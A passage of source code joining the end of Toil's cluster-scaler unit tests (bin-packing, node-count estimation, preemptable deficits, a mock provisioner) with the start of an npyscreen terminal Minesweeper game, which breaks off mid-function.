"""
allocation = self.run1000JobsOnMicros(jobCores=1,
jobMem=h2b('1G'),
jobDisk=h2b('1G'),
jobTime=30000,
globalTargetTime=3600)
self.assertEqual(allocation, {t2_micro: 1000})
def run1000JobsOnMicros(self, jobCores, jobMem, jobDisk, jobTime, globalTargetTime):
"""Test packing 1000 jobs on t2.micros. Depending on the targetTime and resources,
these should pack differently.
"""
nodeShapes = [t2_micro]
bpf = BinPackedFit(nodeShapes, targetTime=globalTargetTime)
for _ in range(1000):
bpf.addJobShape(Shape(wallTime=jobTime,
memory=jobMem,
cores=jobCores,
disk=jobDisk,
preemptable=False))
return bpf.getRequiredNodes()
@travis_test
def testPathologicalCase(self):
"""Test a pathological case where only one node can be requested to fit months' worth of jobs.
If the reservation is extended to fit a long job, and the
bin-packer naively searches through all the reservation slices
to find the first slice that fits, it will happily assign the
first slot that fits the job, even if that slot occurs days in
the future.
"""
# Add one job that partially fills an r3.8xlarge for 1000 hours
self.bpf.addJobShape(Shape(wallTime=3600000,
memory=h2b('10G'),
cores=0,
disk=h2b('10G'),
preemptable=False))
for _ in range(500):
# Add 500 CPU-hours worth of jobs that fill an r3.8xlarge
self.bpf.addJobShape(Shape(wallTime=3600,
memory=h2b('26G'),
cores=32,
disk=h2b('60G'),
preemptable=False))
# Hopefully we didn't assign just one node to cover all those jobs.
self.assertNotEqual(self.bpf.getRequiredNodes(), {r3_8xlarge: 1, c4_8xlarge_preemptable: 0})
@travis_test
def testJobTooLargeForAllNodes(self):
"""
If a job is too large for all node types, the scaler should print a
warning, but definitely not crash.
"""
# Takes more RAM than an r3.8xlarge
largerThanR3 = Shape(wallTime=3600,
memory=h2b('360G'),
cores=32,
disk=h2b('600G'),
preemptable=False)
self.bpf.addJobShape(largerThanR3)
# If we got here we didn't crash.
class ClusterScalerTest(ToilTest):
def setUp(self):
super(ClusterScalerTest, self).setUp()
self.config = Config()
self.config.targetTime = 1800
self.config.nodeTypes = ['r3.8xlarge', 'c4.8xlarge:0.6']
# Set up a stub provisioner with some nodeTypes and nodeShapes.
try:
# In Python 3 we can use a SimpleNamespace as a mock provisioner
self.provisioner = types.SimpleNamespace()
except:
# In Python 2 we should just be able to tack fields onto an object.
# But this has been known to produce:
# AttributeError: 'newobject' object has no attribute 'nodeTypes'
# So we use an Argparse Namespace instead.
import argparse
self.provisioner = argparse.Namespace()
setattr(self.provisioner, 'nodeTypes', ['r3.8xlarge', 'c4.8xlarge'])
setattr(self.provisioner, 'nodeShapes', [r3_8xlarge,
c4_8xlarge_preemptable])
setattr(self.provisioner, 'setStaticNodes', lambda _, __: None)
setattr(self.provisioner, 'retryPredicate', lambda _: False)
self.leader = MockBatchSystemAndProvisioner(self.config, 1)
@travis_test
def testRounding(self):
"""
Test to make sure the ClusterScaler's rounding rounds properly.
"""
# Get a ClusterScaler
self.config.targetTime = 1
self.config.betaInertia = 0.0
self.config.maxNodes = [2, 3]
scaler = ClusterScaler(self.provisioner, self.leader, self.config)
# Exact integers round to themselves
self.assertEqual(scaler._round(0.0), 0)
self.assertEqual(scaler._round(1.0), 1)
self.assertEqual(scaler._round(-1.0), -1)
self.assertEqual(scaler._round(123456789101112.13), 123456789101112)
# Decimals other than X.5 round to the side they are closer to
self.assertEqual(scaler._round(1E-10), 0)
self.assertEqual(scaler._round(0.5 + 1E-15), 1)
self.assertEqual(scaler._round(-0.9), -1)
self.assertEqual(scaler._round(-0.4), 0)
# Decimals at exactly X.5 round away from 0
self.assertEqual(scaler._round(0.5), 1)
self.assertEqual(scaler._round(-0.5), -1)
self.assertEqual(scaler._round(2.5), 3)
self.assertEqual(scaler._round(-2.5), -3)
self.assertEqual(scaler._round(15.5), 16)
self.assertEqual(scaler._round(-15.5), -16)
self.assertEqual(scaler._round(123456789101112.5), 123456789101113)
@travis_test
def testMaxNodes(self):
"""
Set the scaler to be very aggressive, give it a ton of jobs, and
make sure it doesn't go over maxNodes.
"""
self.config.targetTime = 1
self.config.betaInertia = 0.0
self.config.maxNodes = [2, 3]
scaler = ClusterScaler(self.provisioner, self.leader, self.config)
jobShapes = [Shape(wallTime=3600,
cores=2,
memory=h2b('1G'),
disk=h2b('2G'),
preemptable=True)] * 1000
jobShapes.extend([Shape(wallTime=3600,
cores=2,
memory=h2b('1G'),
disk=h2b('2G'),
preemptable=False)] * 1000)
estimatedNodeCounts = scaler.getEstimatedNodeCounts(jobShapes, defaultdict(int))
self.assertEqual(estimatedNodeCounts[r3_8xlarge], 2)
self.assertEqual(estimatedNodeCounts[c4_8xlarge_preemptable], 3)
@travis_test
def testMinNodes(self):
"""
Without any jobs queued, the scaler should still estimate "minNodes" nodes.
"""
self.config.betaInertia = 0.0
self.config.minNodes = [2, 3]
scaler = ClusterScaler(self.provisioner, self.leader, self.config)
jobShapes = []
estimatedNodeCounts = scaler.getEstimatedNodeCounts(jobShapes, defaultdict(int))
self.assertEqual(estimatedNodeCounts[r3_8xlarge], 2)
self.assertEqual(estimatedNodeCounts[c4_8xlarge_preemptable], 3)
@travis_test
def testPreemptableDeficitResponse(self):
"""
When a preemptable deficit was detected by a previous run of the
loop, the scaler should add non-preemptable nodes to
compensate in proportion to preemptableCompensation.
"""
self.config.targetTime = 1
self.config.betaInertia = 0.0
self.config.maxNodes = [10, 10]
# This should mean that one non-preemptable node is launched
# for every two preemptable nodes "missing".
self.config.preemptableCompensation = 0.5
# In this case, we want to explicitly set up the config so
# that we can have preemptable and non-preemptable nodes of
# the same type. That is the only situation where
# preemptableCompensation applies.
self.config.nodeTypes = ['c4.8xlarge:0.6', 'c4.8xlarge']
self.provisioner.nodeTypes = ['c4.8xlarge', 'c4.8xlarge']
self.provisioner.nodeShapes = [c4_8xlarge_preemptable,
c4_8xlarge]
scaler = ClusterScaler(self.provisioner, self.leader, self.config)
# Simulate a situation where a previous run caused a
# "deficit" of 5 preemptable nodes (e.g. a spot bid was lost)
scaler.preemptableNodeDeficit['c4.8xlarge'] = 5
# Add a bunch of preemptable jobs (so the bin-packing
# estimate for the non-preemptable node should still be 0)
jobShapes = [Shape(wallTime=3600,
cores=2,
memory=h2b('1G'),
disk=h2b('2G'),
preemptable=True)] * 1000
estimatedNodeCounts = scaler.getEstimatedNodeCounts(jobShapes, defaultdict(int))
# We don't care about the estimated size of the preemptable
# nodes. All we want to know is if we responded to the deficit
# properly: 0.5 * 5 (preemptableCompensation * the deficit) = 3 (rounded up).
self.assertEqual(estimatedNodeCounts[self.provisioner.nodeShapes[1]], 3)
@travis_test
def testPreemptableDeficitIsSet(self):
"""
Make sure that updateClusterSize sets the preemptable deficit if
it can't launch preemptable nodes properly. That way, the
deficit can be communicated to the next run of
estimateNodeCount.
"""
# Mock out addNodes. We want to pretend it had trouble
# launching all 5 nodes, and could only launch 3.
self.provisioner.addNodes = MagicMock(return_value=3)
# Pretend there are no nodes in the cluster right now
self.provisioner.getProvisionedWorkers = MagicMock(return_value=[])
# In this case, we want to explicitly set up the config so
# that we can have preemptable and non-preemptable nodes of
# the same type. That is the only situation where
# preemptableCompensation applies.
self.config.nodeTypes = ['c4.8xlarge:0.6', 'c4.8xlarge']
self.provisioner.nodeTypes = ['c4.8xlarge', 'c4.8xlarge']
self.provisioner.nodeShapes = [c4_8xlarge_preemptable,
c4_8xlarge]
scaler = ClusterScaler(self.provisioner, self.leader, self.config)
estimatedNodeCounts = {c4_8xlarge_preemptable: 5, c4_8xlarge: 0}
scaler.updateClusterSize(estimatedNodeCounts)
self.assertEqual(scaler.preemptableNodeDeficit['c4.8xlarge'], 2)
self.provisioner.addNodes.assert_called_once()
# OK, now pretend this is a while later, and actually launched
# the nodes properly. The deficit should disappear
self.provisioner.addNodes = MagicMock(return_value=5)
scaler.updateClusterSize(estimatedNodeCounts)
self.assertEqual(scaler.preemptableNodeDeficit['c4.8xlarge'], 0)
@travis_test
def testNoLaunchingIfDeltaAlreadyMet(self):
"""
Check that the scaler doesn't try to launch "0" more instances if
the delta was able to be met by unignoring nodes.
"""
# We have only one node type for simplicity
self.provisioner.nodeTypes = ['c4.8xlarge']
self.provisioner.nodeShapes = [c4_8xlarge]
scaler = ClusterScaler(self.provisioner, self.leader, self.config)
# Pretend there is one ignored worker in the cluster
self.provisioner.getProvisionedWorkers = MagicMock(
return_value=[Node('127.0.0.1', '127.0.0.1', 'testNode',
datetime.datetime.now().isoformat(),
nodeType='c4.8xlarge', preemptable=True)])
scaler.ignoredNodes.add('127.0.0.1')
# Exercise the updateClusterSize logic
self.provisioner.addNodes = MagicMock()
scaler.updateClusterSize({c4_8xlarge: 1})
self.assertFalse(self.provisioner.addNodes.called,
"addNodes was called when no new nodes were needed")
self.assertEqual(len(scaler.ignoredNodes), 0,
"The scaler didn't unignore an ignored node when "
"scaling up")
@travis_test
def testBetaInertia(self):
# This is really high, but makes things easy to calculate.
self.config.betaInertia = 0.5
scaler = ClusterScaler(self.provisioner, self.leader, self.config)
# OK, smoothing things this much should get us 50% of the way to 100.
self.assertEqual(scaler.smoothEstimate(c4_8xlarge_preemptable, 100), 50)
# Now we should be at 75%.
self.assertEqual(scaler.smoothEstimate(c4_8xlarge_preemptable, 100), 75)
# We should eventually converge on our estimate as long as betaInertia is below 1.
for _ in range(1000):
scaler.smoothEstimate(c4_8xlarge_preemptable, 100)
self.assertEqual(scaler.smoothEstimate(c4_8xlarge_preemptable, 100), 100)
class ScalerThreadTest(ToilTest):
def _testClusterScaling(self, config, numJobs, numPreemptableJobs, jobShape):
"""
Test the ClusterScaler class with different patterns of job creation. Tests ascertain that
autoscaling occurs and that all the jobs are run.
"""
# First do simple test of creating 100 preemptable and non-premptable jobs and check the
# jobs are completed okay, then print the amount of worker time expended and the total
# number of worker nodes used.
mock = MockBatchSystemAndProvisioner(config, secondsPerJob=2.0)
mock.start()
clusterScaler = ScalerThread(mock, mock, config)
clusterScaler.start()
try:
# Add 100 jobs to complete
list(map(lambda x: mock.addJob(jobShape=jobShape),
list(range(numJobs))))
list(map(lambda x: mock.addJob(jobShape=jobShape, preemptable=True),
list(range(numPreemptableJobs))))
# Add some completed jobs
for preemptable in (True, False):
if preemptable and numPreemptableJobs > 0 or not preemptable and numJobs > 0:
# Add 1000 random jobs
for _ in range(1000):
x = mock.getNodeShape(nodeType=jobShape)
iJ = JobDescription(requirements=dict(
memory=random.choice(list(range(1, x.memory))),
cores=random.choice(list(range(1, x.cores))),
disk=random.choice(list(range(1, x.disk))),
preemptable=preemptable),
jobName='testClusterScaling', unitName='')
clusterScaler.addCompletedJob(iJ, random.choice(list(range(1, x.wallTime))))
startTime = time.time()
# Wait while the cluster processes the jobs
while (mock.getNumberOfJobsIssued(preemptable=False) > 0
or mock.getNumberOfJobsIssued(preemptable=True) > 0
or mock.getNumberOfNodes() > 0 or mock.getNumberOfNodes(preemptable=True) > 0):
logger.debug("Running, non-preemptable queue size: %s, non-preemptable workers: %s, "
"preemptable queue size: %s, preemptable workers: %s" %
(mock.getNumberOfJobsIssued(preemptable=False),
mock.getNumberOfNodes(preemptable=False),
mock.getNumberOfJobsIssued(preemptable=True),
mock.getNumberOfNodes(preemptable=True)))
clusterScaler.check()
time.sleep(0.5)
logger.debug("We waited %s for cluster to finish" % (time.time() - startTime))
finally:
clusterScaler.shutdown()
mock.shutDown()
# Print some info about the autoscaling
logger.debug("Total-jobs: %s: Max-workers: %s, "
"Total-worker-time: %s, Worker-time-per-job: %s" %
(mock.totalJobs, sum(mock.maxWorkers.values()),
mock.totalWorkerTime,
old_div(mock.totalWorkerTime, mock.totalJobs) if mock.totalJobs > 0 else 0.0))
@slow
def testClusterScaling(self):
"""
Test scaling for a batch of non-preemptable jobs and no preemptable jobs (makes debugging
easier).
"""
config = Config()
# Make defaults dummy values
config.defaultMemory = 1
config.defaultCores = 1
config.defaultDisk = 1
# No preemptable nodes/jobs
config.maxPreemptableNodes = [] # No preemptable nodes
# Non-preemptable parameters
config.nodeTypes = [Shape(20, 10, 10, 10, False)]
config.minNodes = [0]
config.maxNodes = [10]
# Algorithm parameters
config.targetTime = defaultTargetTime
config.betaInertia = 0.1
config.scaleInterval = 3
self._testClusterScaling(config, numJobs=100, numPreemptableJobs=0,
jobShape=config.nodeTypes[0])
@slow
def testClusterScalingMultipleNodeTypes(self):
smallNode = Shape(20, 5, 10, 10, False)
mediumNode = Shape(20, 10, 10, 10, False)
largeNode = Shape(20, 20, 10, 10, False)
numJobs = 100
config = Config()
# Make defaults dummy values
config.defaultMemory = 1
config.defaultCores = 1
config.defaultDisk = 1
# No preemptable nodes/jobs
config.preemptableNodeTypes = []
config.minPreemptableNodes = []
config.maxPreemptableNodes = [] # No preemptable nodes
# Make sure the node types don't have to be ordered
config.nodeTypes = [largeNode, smallNode, mediumNode]
config.minNodes = [0, 0, 0]
config.maxNodes = [10, 10] # test expansion of this list
# Algorithm parameters
config.targetTime = defaultTargetTime
config.betaInertia = 0.1
config.scaleInterval = 3
mock = MockBatchSystemAndProvisioner(config, secondsPerJob=2.0)
clusterScaler = ScalerThread(mock, mock, config)
clusterScaler.start()
mock.start()
try:
# Add small jobs
list(map(lambda x: mock.addJob(jobShape=smallNode), list(range(numJobs))))
list(map(lambda x: mock.addJob(jobShape=mediumNode), list(range(numJobs))))
# Add medium completed jobs
for i in range(1000):
iJ = JobDescription(requirements=dict(
memory=random.choice(range(smallNode.memory, mediumNode.memory)),
cores=mediumNode.cores,
disk=largeNode.cores,
preemptable=False),
jobName='testClusterScaling', unitName='')
clusterScaler.addCompletedJob(iJ, random.choice(range(1, 10)))
while mock.getNumberOfJobsIssued() > 0 or mock.getNumberOfNodes() > 0:
logger.debug("%i nodes currently provisioned" % mock.getNumberOfNodes())
# Make sure there are no large nodes
self.assertEqual(mock.getNumberOfNodes(nodeType=largeNode), 0)
clusterScaler.check()
time.sleep(0.5)
finally:
clusterScaler.shutdown()
mock.shutDown()
# Make sure jobs ran on both the small and medium node types
self.assertTrue(mock.totalJobs > 0)
self.assertTrue(mock.maxWorkers[smallNode] > 0)
self.assertTrue(mock.maxWorkers[mediumNode] > 0)
self.assertEqual(mock.maxWorkers[largeNode], 0)
@slow
def testClusterScalingWithPreemptableJobs(self):
"""
Test scaling simultaneously for a batch of preemptable and non-preemptable jobs.
"""
config = Config()
jobShape = Shape(20, 10, 10, 10, False)
preemptableJobShape = Shape(20, 10, 10, 10, True)
# Make defaults dummy values
config.defaultMemory = 1
config.defaultCores = 1
config.defaultDisk = 1
# non-preemptable node parameters
config.nodeTypes = [jobShape, preemptableJobShape]
config.minNodes = [0, 0]
config.maxNodes = [10, 10]
# Algorithm parameters
config.targetTime = defaultTargetTime
config.betaInertia = 0.9
config.scaleInterval = 3
self._testClusterScaling(config, numJobs=100, numPreemptableJobs=100, jobShape=jobShape)
# noinspection PyAbstractClass
class MockBatchSystemAndProvisioner(AbstractScalableBatchSystem, AbstractProvisioner):
"""
Mimics a job batcher, provisioner and scalable batch system
"""
def __init__(self, config, secondsPerJob):
super(MockBatchSystemAndProvisioner, self).__init__('clusterName')
# To mimic parallel preemptable and non-preemptable queues
# for jobs we create two parallel instances of the following class
self.config = config
self.secondsPerJob = secondsPerJob
self.provisioner = self
self.batchSystem = self
self.nodeTypes = config.nodeTypes
self.nodeShapes = self.nodeTypes
self.nodeShapes.sort()
self.jobQueue = Queue()
self.updatedJobsQueue = Queue()
self.jobBatchSystemIDToIssuedJob = {}
self.totalJobs = 0 # Count of total jobs processed
self.totalWorkerTime = 0.0 # Total time spent in worker threads
self.toilMetrics = None
self.nodesToWorker = {} # Map from Node to instances of the Worker class
self.workers = {nodeShape: [] for nodeShape in
self.nodeShapes} # Instances of the Worker class
self.maxWorkers = {nodeShape: 0 for nodeShape in
self.nodeShapes} # Maximum number of workers
self.running = False
self.leaderThread = Thread(target=self._leaderFn)
def start(self):
self.running = True
self.leaderThread.start()
def shutDown(self):
self.running = False
self.leaderThread.join()
# Stub out all AbstractBatchSystem methods since they are never called
for name, value in iteritems(AbstractBatchSystem.__dict__):
if getattr(value, '__isabstractmethod__', False):
exec('def %s(): pass' % name)
# Without this, the class would end up with .name and .value attributes
del name, value
# AbstractScalableBatchSystem methods
def nodeInUse(self, nodeIP):
return False
def ignoreNode(self, nodeAddress):
pass
def unignoreNode(self, nodeAddress):
pass
@contextmanager
def nodeFiltering(self, filter):
nodes = self.getProvisionedWorkers(preemptable=True,
nodeType=None) + self.getProvisionedWorkers(
preemptable=False, nodeType=None)
yield nodes
# AbstractProvisioner methods
def getProvisionedWorkers(self, nodeType=None, preemptable=None):
"""
Returns a list of Node objects, each representing a worker node in the cluster
:param preemptable: If True only return preemptable nodes else return non-preemptable nodes
:return: list of Node
"""
nodesToWorker = self.nodesToWorker
if nodeType:
return [node for node in nodesToWorker if node.nodeType == nodeType]
else:
return list(nodesToWorker.keys())
def terminateNodes(self, nodes):
self._removeNodes(nodes)
def remainingBillingInterval(self, node):
pass
def addJob(self, jobShape, preemptable=False):
"""
Add a job to the job queue
"""
self.totalJobs += 1
jobID = uuid.uuid4()
self.jobBatchSystemIDToIssuedJob[jobID] = JobDescription(requirements={"memory": jobShape.memory,
"cores": jobShape.cores,
"disk": jobShape.disk,
"preemptable": preemptable},
jobName='job{}'.format(self.totalJobs))
self.jobQueue.put(jobID)
# JobBatcher functionality
def getNumberOfJobsIssued(self, preemptable=None):
if preemptable is not None:
jobList = [job for job in list(self.jobQueue.queue) if
self.jobBatchSystemIDToIssuedJob[job].preemptable == preemptable]
return len(jobList)
else:
return self.jobQueue.qsize()
def getJobs(self):
return self.jobBatchSystemIDToIssuedJob.values()
# AbstractScalableBatchSystem functionality
def getNodes(self, preemptable=False, timeout=None):
nodes = dict()
for node in self.nodesToWorker:
if node.preemptable == preemptable:
worker = self.nodesToWorker[node]
nodes[node.privateIP] = NodeInfo(coresTotal=0, coresUsed=0, requestedCores=1,
memoryTotal=0, memoryUsed=0, requestedMemory=1,
workers=1 if worker.busyEvent.is_set() else 0)
return nodes
# AbstractProvisioner functionality
def addNodes(self, nodeType, numNodes, preemptable):
self._addNodes(numNodes=numNodes, nodeType=nodeType, preemptable=preemptable)
return self.getNumberOfNodes(nodeType=nodeType, preemptable=preemptable)
def getNodeShape(self, nodeType, preemptable=False):
# Assume node shapes and node types are the same thing for testing
return nodeType
def getWorkersInCluster(self, nodeShape):
return self.workers[nodeShape]
def launchCluster(self, leaderNodeType, keyName, userTags=None,
vpcSubnet=None, leaderStorage=50, nodeStorage=50, botoPath=None, **kwargs):
pass
def destroyCluster(self):
pass
def getLeader(self):
pass
def _leaderFn(self):
while self.running:
updatedJobID = None
try:
updatedJobID = self.updatedJobsQueue.get(timeout=1.0)
except Empty:
continue
if updatedJobID:
del self.jobBatchSystemIDToIssuedJob[updatedJobID]
time.sleep(0.1)
def _addNodes(self, numNodes, nodeType, preemptable=False):
nodeShape = self.getNodeShape(nodeType=nodeType, preemptable=preemptable)
class Worker(object):
def __init__(self, jobQueue, updatedJobsQueue, secondsPerJob):
self.busyEvent = Event()
self.stopEvent = Event()
def workerFn():
while True:
if self.stopEvent.is_set():
return
try:
jobID = jobQueue.get(timeout=1.0)
except Empty:
continue
updatedJobsQueue.put(jobID)
self.busyEvent.set()
time.sleep(secondsPerJob)
self.busyEvent.clear()
self.startTime = time.time()
self.worker = Thread(target=workerFn)
self.worker.start()
def stop(self):
self.stopEvent.set()
self.worker.join()
return time.time() - self.startTime
for _ in range(numNodes):
node = Node('127.0.0.1', uuid.uuid4(), 'testNode', datetime.datetime.now().isoformat()+'Z', nodeType=nodeType,
preemptable=preemptable)
self.nodesToWorker[node] = Worker(self.jobQueue, self.updatedJobsQueue, self.secondsPerJob)
self.workers[nodeShape].append(self.nodesToWorker[node])
self.maxWorkers[nodeShape] = max(self.maxWorkers[nodeShape], len(self.workers[nodeShape]))
def _removeNodes(self, nodes):
logger.debug("Removing nodes. %s workers and %s to terminate.", len(self.nodesToWorker),
len(nodes))
for node in nodes:
logger.debug("removed node")
try:
nodeShape = self.getNodeShape(node.nodeType, node.preemptable)
worker = self.nodesToWorker.pop(node)
self.workers[nodeShape].pop()
self.totalWorkerTime += worker.stop()
except KeyError:
# Node isn't our responsibility
pass
def getNumberOfNodes(self, nodeType=None, preemptable=None):
if nodeType:
nodeShape = self.getNodeShape(nodeType=nodeType, preemptable=preemptable)
return len(self.workers[nodeShape])
else:
return len(self.nodesToWorker)
|
terminalUI.py
|
#!/usr/bin/env python3
"""Minesweeper Game - Terminal Interface
Runs the game in the Terminal using npyscreen.
Use --help to show the possible flags and their use.
TODO: ranking - add datetime
FIXME: improve flags to change the TUI before initializing
FIXME: improve flags to start game immediately at X dificulty
"""
from minesweeper import Minesweeper
import npyscreen as nps
import regex as re
import json
import time
from threading import Thread
import click
class App(nps.NPSAppManaged):
"""Minesweeper App Module
This extends the class NPSAppManaged from npyscreen.
It defines the Forms to be used later on start.
It also define "menu" as the first Form.
If a Map Dificulty was set, then the App will jump imediatly to the
Map Form and will use the set Dificulty and Player name.
"""
STARTING_FORM = "menu"
map = None
player = "NoName"
def onStart(self):
self.addForm("menu", MenuForm, "Minesweeper - Main Menu", minimum_lines=16)
self.addForm("custom", CustomMapForm, "Minesweeper - Custom Dificulty", minimum_lines=16)
self.addForm("map", MapForm, "Minesweeper - Game", minimum_lines=28)
if self.map:
map = self.getForm("map")
map.player.value = self.player
map.dificulty.value = self.map
if self.map == "Custom":
pass
elif self.map == "Easy":
map.gen_map(10,8,10)
elif self.map == "Normal":
map.gen_map(20,10,30)
elif self.map == "Hard":
map.gen_map(30,20,125)
self.setNextForm("map")
def setGameOptions(self, name, dificulty):
"""Set game options"""
self.player = name
self.map = dificulty
### FORMS
class MenuForm(nps.ActionForm):
"""Menu Form Module
This extends the class ActionForm from npyscreen.
It contains a Field for the Player Name and Dificulty selector.
Pressing Cancel leaves the game.
Pressing OK takes the Player to the game Screen/Form, unless the player
selected the Custom dificulty (in this case player is taken to a extra
Form, for custom size settings, before going into game).
"""
def create(self):
"""Create Custom Form
This function is called when Custom Form is created.
It creates all the widgets for the Form.
"""
# self.example = self.add(nps.TitleFixedText, name="Fixed Title", value="Fixed Label", editable=False, labelColor="STANDOUT", color="CAUTION")
self.player = self.add(nps.TitleText, name="Name:", labelColor="STANDOUT")
self.nextrely += 1
self.dificulty = self.add(nps.TitleSelectOne, name="Dificulty", values=["Custom", "Easy", "Normal", "Hard"], value=[1], labelColor="STANDOUT", max_height=5, scroll_exit=True)
self.nextrely += 1
self.add(nps.FixedText, value="Maximazing the Terminal is very advised!", editable=False, color="CAUTION")
def on_ok(self):
map = self.parentApp.getForm("map")
map.player.value = self.player.value or "NoName"
selectedDificulty = self.dificulty.values[self.dificulty.value[0]]
map.dificulty.value = selectedDificulty
if selectedDificulty == "Custom":
self.parentApp.setNextForm("custom")
else:
if selectedDificulty == "Easy":
map.gen_map(10,8,10)
elif selectedDificulty == "Normal":
map.gen_map(20,10,30)
elif selectedDificulty == "Hard":
map.gen_map(30,20,125)
self.parentApp.setNextForm("map")
def on_cancel(self):
self.parentApp.setNextForm(None)
# self.parentApp.switchForm(None)
class CustomMapForm(nps.ActionForm):
"""Custom Form Module
This extends the class ActionForm from npyscreen.
It contains 3 sliders for the Player to choose the Custom Widht, Height and Number of Mines.
Pressing Cancel takes the Player back to the Menu.
Pressing OK takes the Player to the game Screen/Form.
Note: Number of Mines cannot be greater than half of the Minefield size.
"""
def create(self):
"""Create Custom Form
This function is called when Custom Form is created.
It creates all the widgets for the Form.
"""
self.width = self.add(nps.TitleSlider, name="Custom Width (Min 5 | Max 40):", labelColor="STANDOUT", lowest=5, out_of=40, value=5)
self.height = self.add(nps.TitleSlider, name="Custom Height (Min 5 | Max 20):", labelColor="STANDOUT", lowest=5, out_of=20, value=5)
self.mines = self.add(nps.TitleSlider, name="Custom Number of Mines (Min 10 | Max W*H/2):", labelColor="STANDOUT", lowest=10, out_of=400, value=10)
def on_ok(self):
size = int(self.width.value)*int(self.height.value)
if int(self.mines.value) > size/2 :
nps.notify_confirm("Map cannot have more than half mine squares!!!\n(Number Mines > Half Map Size)", "Too many mines!!!", editw=1)
else:
width = int(self.width.value)
height = int(self.height.value)
mines = int(self.mines.value)
map = self.parentApp.getForm("map")
map.gen_map(width,height,mines)
self.parentApp.setNextForm("map")
def on_cancel(self):
self.parentApp.switchFormPrevious()
class MapForm(nps.FormBaseNew):
"""Map Form Module
This extends the class FormBaseNew from npyscreen.
It contains information about the game (player name and minefield size and mine number) and the minefield.
List of Shortcuts:
-> d - discover/reveals a square
-> f - flags a square
-> q - quit/leave game
-> r - restart game
-> p - pause game (TODO)
-> arrows - move cursor
-> h/j/k/l - move cursor
Attributes
----------
minefieldClass : Minefield Class from generator.py
Matrix where each position is a Tuple (Status,Number)
NOTES:
Each cell/square (from the class matrixTuples variable) is a
Tuple (Status,Number)
-> status - (flaged -1/hidden 0/visible 1)
-> number - square number (or -1 for mines)
"""
def h_flag(self, ascii_code):
"""Minefield Flag handler
This function handles a right-click.
This flags a square in-game.
"""
x = self.minefieldGrid.edit_cell[1]
y = self.minefieldGrid.edit_cell[0]
self.minefieldClass.flag(x,y)
if self.minefieldClass.checkVictory():
self.timer_end = time.time()
self.final_time = self.timer_end - self.timer_start
self.timer_start = 0
submit_time(self.dificulty.value, self.player.value, self.timer.value)
response = nps.notify_yes_no("You Won the Game !!!\nTime: "+str(self.final_time)+"\nDo you wish to replay the Map?", title="VICTORY", form_color='STANDOUT', wrap=True, editw=1)
if response:
self.gen_map(int(self.width.value),int(self.height.value),int(self.mines.value))
self.display()
else:
self.parentApp.switchForm("menu")
def h_discover(self, ascii_code):
"""Minefield Click handler
This function handles a left-click.
This reveals a square in-game.
"""
if self.timer_start == 0:
self.timer_start = time.time()
self.timer.value = "0"
self.timer.display()
x = self.minefieldGrid.edit_cell[1]
y = self.minefieldGrid.edit_cell[0]
result = self.minefieldClass.click(x,y,expand=True)
if result == -2: # mine on first square
while result == -2: # generate new map until its safe
self.gen_map(int(self.width.value),int(self.height.value),int(self.mines.value))
result = self.minefieldClass.click(x,y,expand=True)
self.display()
if result == -1: # mine
self.timer_end = time.time()
self.final_time = self.timer_end - self.timer_start
self.timer_start = 0
response = nps.notify_yes_no("You Lost the Game :(\nYour current time was: "+str(self.final_time)+"\nDo you wish to retry the Map?\n", title="LOST", form_color='STANDOUT', wrap=True, editw=1)
if response:
self.gen_map(int(self.width.value),int(self.height.value),int(self.mines.value))
self.display()
else:
self.parentApp.switchForm("menu")
def h_terminate(self, ascii_code):
"""Minefield Terminate handler
This terminates/quits the current game, returning to the Menu.
"""
self.timer_start = 0 # stop timer
self.timer.value = "0"
self.timer.display()
self.parentApp.switchForm("menu")
def h_restart(self, ascii_code):
"""Minefield Restart handler
This restarts the game, with a new Minefield, but the same settings.
"""
self.timer_start = 0 # stop timer
self.timer.value = "0"
self.timer.display()
self.gen_map(int(self.width.value),int(self.height.value),int(self.mines.value))
# def onStart(self):
def create(self):
"""Create Map Form
This function is called when Map Form is created.
It creates all the widgets for the Form and the shortcut handlers.
"""
new_handlers = {
"d" : self.h_discover,
"f" : self.h_flag,
"t" : self.h_terminate,
"r" : self.h_restart,
# "p" : self.h_pause,
}
self.add_handlers(new_handlers)
# INFO area
self.player = self.add(nps.TitleFixedText, name="Your Name: ", labelColor="STANDOUT", use_two_lines=False, begin_entry_at=11, editable=False)
self.nextrelx += 24
self.nextrely -= 1
self.timer = self.add(nps.TitleFixedText, name="Time:", value="0", labelColor="STANDOUT", use_two_lines=False, begin_entry_at=7, editable=False)
# MAP INFO area
self.nextrelx = 2
self.dificulty = self.add(nps.TitleFixedText, name="Dificulty: ", labelColor="STANDOUT", use_two_lines=False, begin_entry_at=11, editable=False)
self.nextrelx += 24
self.nextrely -= 1
self.width = self.add(nps.TitleFixedText, name="Width: ", labelColor="STANDOUT", use_two_lines=False, begin_entry_at=7, editable=False)
self.nextrelx += 16
self.nextrely -= 1
self.height = self.add(nps.TitleFixedText, name="Height: ", labelColor="STANDOUT", use_two_lines=False, begin_entry_at=8, editable=False)
self.nextrelx += 16
self.nextrely -= 1
self.mines = self.add(nps.TitleFixedText, name="Mines: ", labelColor="STANDOUT", use_two_lines=False, begin_entry_at=7, editable=False)
# SHORTCUTS area
self.nextrelx = 2
self.add(nps.FixedText, value="Shorcuts: ", color="STANDOUT", editable=False)
self.nextrelx += 12
self.nextrely -= 1
self.add(nps.TitleFixedText, name="d: ", value="click", labelColor="GOOD", use_two_lines=False, begin_entry_at=4, editable=False)
self.add(nps.TitleFixedText, name="f: ", value="flag", labelColor="GOOD", use_two_lines=False, begin_entry_at=4, editable=False)
self.add(nps.TitleFixedText, name="t: ", value="terminate", labelColor="GOOD", use_two_lines=False, begin_entry_at=4, editable=False)
self.add(nps.TitleFixedText, name="r: ", value="restart", labelColor="GOOD", use_two_lines=False, begin_entry_at=4, editable=False)
# self.add(nps.TitleFixedText, name="p: ", value="pause", labelColor="GOOD", use_two_lines=False, begin_entry_at=4, editable=False)
# MINEFIELD area
self.nextrelx = 2
self.nextrely += 1
self.minefieldGrid = self.add(MinefieldGridWidget, name=" ", column_width=2, col_margin=0, row_height=1)
# TIMER stuff
self.timer_start = 0
self.thread_time = Thread(target=self.update_time,args=())
self.thread_time.daemon = True
self.thread_time.start()
def update_time(self):
""" Timer handler
This function will update the timer label 1 time per second
(in pratice makes the timer go up by 1 second)
"""
while True:
if self.timer_start != 0:
self.timer_end = time.time()
self.timer.value = str(int(self.timer_end - self.timer_start))
self.timer.display()
time.sleep(1)
def gen_map(self, width, height, mines):
"""Generate Minesweeper Map
Uses the Minefield Class from generator.py
Creates a instance of Minefield with the given paramaters and
passes the matrix values to the Minefield widget values.
"""
self.width.value = width
self.height.value = height
self.mines.value = mines
